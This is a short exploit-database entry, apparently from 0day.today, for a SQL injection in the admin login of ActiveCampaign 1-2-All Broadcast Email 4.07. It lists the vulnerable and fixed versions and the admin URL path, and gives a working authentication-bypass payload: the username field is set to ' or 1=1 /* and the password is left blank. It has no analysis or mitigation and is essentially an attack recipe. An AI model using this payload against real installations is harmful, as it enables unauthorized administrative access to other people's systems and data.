id: 11349
date: 03/18/2010
title: ActiveCampaign 1-2-All Broadcast Email 4.0 7 SQL Injection Vulnerability
author: n/a
cves: 

===============================================================================================
ActiveCampaign 1-2-All Broadcast Email Admin Control Panel Username SQL Injection Vulnerability
===============================================================================================

Vulnerable:  	 ActiveCampaign 1-2-All Broadcast Email 4.0 7
Not Vulnerable: 	ActiveCampaign 1-2-All Broadcast Email 4.08

http://www.example.com/[12allTarget]/admin/index.php

Username: ' or 1=1 /*
Password: (Nothing)(Blank) 



#  0day.today [2023-03-24]  #